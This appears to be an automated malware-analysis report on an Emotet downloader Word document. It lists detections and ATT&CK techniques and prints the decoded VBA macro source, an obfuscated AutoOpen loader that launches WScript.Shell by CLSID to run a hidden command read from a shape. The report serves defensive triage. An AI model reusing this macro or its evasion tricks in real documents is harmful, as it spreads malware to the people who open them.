MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage the WScript.Shell COM object to execute cmd.exe. The command executed is heavily obfuscated but appears to construct a URL and download a second-stage payload. The ClamAV detection and heuristic firings strongly indicate this is a downloader variant of the Emotet family.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826431-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826431-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5749 bytes |
SHA-256: 741a5d0d0e0d2f2f26ad79d991a1e862a361b8149aa7ff831a277278eb5c7876 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
105 of 156 identifiers look randomly generated (e.g. 'KiQHBHzjqo') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NfhRrib"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case VLdwEK
Case 15131936
GCJFwzJmV = 312165642
ZrCbQzsSd = CLng(327202709)
Case 226308632
JJjUjGL = Oct(tBOJWbzr)
ZLpzoPW = kNwLsY
Case 294776129
czvPccj = CDate(MwXdtE)
BAwElsbV = Int(306937547 * BvtOWA)
End Select
On Error Resume Next
Select Case kMLDHOmm
Case 127526074
wckwbvXXl = 10628416
aVzNNi = CLng(57406342)
Case 295022822
kpqLimBJ = Oct(zHZiznMB)
uAilh = QJqMq
Case 301667795
iulJGlZN = CDate(uOsmuurY)
BMaNsz = Int(334639252 * qvYvp)
End Select
On Error Resume Next
Select Case cQVTLE
Case 63613879
FtwBZR = 103661861
iurwmSUKv = CLng(251765696)
Case 285218744
ASJwwk = Oct(QQditjtBS)
wzmrMi = oEjJwLXZN
Case 324437860
njzDoS = CDate(cFPzOsQBs)
mEUnnNKtE = Int(269297437 * FFFjmf)
End Select
On Error Resume Next
Select Case kZGcod
Case 27149875
MdLdj = 200518866
ALBYmXoGX = CLng(225338729)
Case 149182203
zZIPFE = Oct(LFjQQSCS)
liGuw = kwlHSpwS
Case 228198655
RPGfEOFYz = CDate(rRvkFk)
jVobb = Int(115288969 * pMiwm)
End Select
Set TvLTskZj = Shapes("zcYICaAl")
On Error Resume Next
Select Case bpLNaWYN
Case 170293607
btZLYAWnp = 122552508
SiIkU = CLng(282292005)
Case 302299572
HoGtPz = Oct(QpnJvqrEw)
FHzJjaXNh = HDdFj
Case 201988746
SCVzKLdkj = CDate(fWOaiLqOj)
IXOifhqnM = Int(77471184 * dRuYBatv)
End Select
On Error Resume Next
Select Case siRVEHKw
Case 328682984
LnimNzKiZ = 339408030
cAift = CLng(330037178)
Case 94407295
zuQvYZkD = Oct(iUjhFh)
hlhjKc = mtfQh
Case 257934290
LJwJwCvr = CDate(NdtrD)
TYWTS = Int(334976911 * QicXm)
End Select
On Error Resume Next
Select Case UzWMI
Case 50940566
jjRbbU = 78212833
zhmufTlf = CLng(325890287)
Case 141247575
kisAiR = Oct(RBKJXcw)
uLFKOFA = UoLvP
Case 283886450
TZrpXjqf = CDate(KzCKVoJK)
GYaZmHNjX = Int(161537658 * SVOaTq)
End Select
On Error Resume Next
Select Case IcOnZTZf
Case 12214148
JplwhAHp = 153678308
LDbAw = CLng(208601453)
Case 84029814
jDwaVY = Oct(YOwYAO)
hliBDQaJM = TXVFBNrt
Case 42579489
wwliTN = CDate(IlLRXuSV)
VucvoWrMG = Int(327251806 * GXAEi)
End Select
KiQHBHzjqo = "" + JDQiSKjY + QpfUDRk + TvLTskZj.TextFrame.TextRange.Text + hbPRpN + ZHtNUqD + cMktjA
On Error Resume Next
Select Case jZBKIi
Case 8276858
NPJmflS = 186192330
mTlTr = CLng(226914952)
Case 207270491
rduGAzLb = Oct(vwRVTUizb)
KbwCQE = iJcqrr
Case 146621912
RAGQNSw = CDate(jpTKl)
wDUQRU = Int(66224729 * adBjOBzFD)
End Select
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
On Error Resume Next
Select Case zZIPYUA
Case 541397
QSuNCVO = 233435738
saiREHjb = CLng(56873109)
Case 97211930
kZMVu = Oct(OznORN)
QEYKIQMp = ipppfVBj
Case 322489168
lwqqFY = CDate(lGOvRa)
wAziZT = Int(291729254 * OEvWj)
End Select
On Error Resume Next
Select Case hiswVivQG
Case 233192990
liqwiwm = 163074422
tWpMw = CLng(43829233)
Case 176409652
FkvKi = Oct(HmmdPUW)
mzmucNAMd = DZzLojCOH
Case 278426237
VnQHJi = CDate(sTWElC)
sZCiNEsH = Int(338007662 * EWwzG)
End Select
Const iflKAuswi = 0
On Error Resume Next
Select Case zmwZRf
Case 20356153
iVqvDwlRB = 181861349
hjWGrmK = CLng(75256157)
Case 271310302
SwwLptN = Oct(dPnXl)
CjONpTOBY = NkdjH
Case 251644728
UNdLX = CDate(jNCYMXMkK)
jDKYwVWGR = Int(171246929 * wFQhzrITJ)
End Select
On Error Resume Next
Select Case olsGnSksb
Case 202738348
LvMtrlDkD = 127267149
GnvRMapCt = CLng(272692696)
Case 232593572
LjtBnSiv = Oct(iDbZV)
LaCncj = fEKWFJDZ
Case 245228971
cGBKw = CDate(QRYYwXkT)
rMdbqCGIX = Int(22600673 * qQNVrdzz)
End Select
FqTTzQNYu.Run! KiQHBHzjqo, iflKAuswi
On Error Resume Next
Select Case zURlkio
Case 294353168
ADowIECwu = 31374145
TNPQTGj = CLng(206168440)
Case 283664432
SlNBFzjER = Oct(hBFiXOpF)
sVZAZL = EBRdzIBB
Case 223332389
bwCHSs = CDate(PtRHhtF)
dOwTtl = Int(259411127 * VsinnqYAE)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.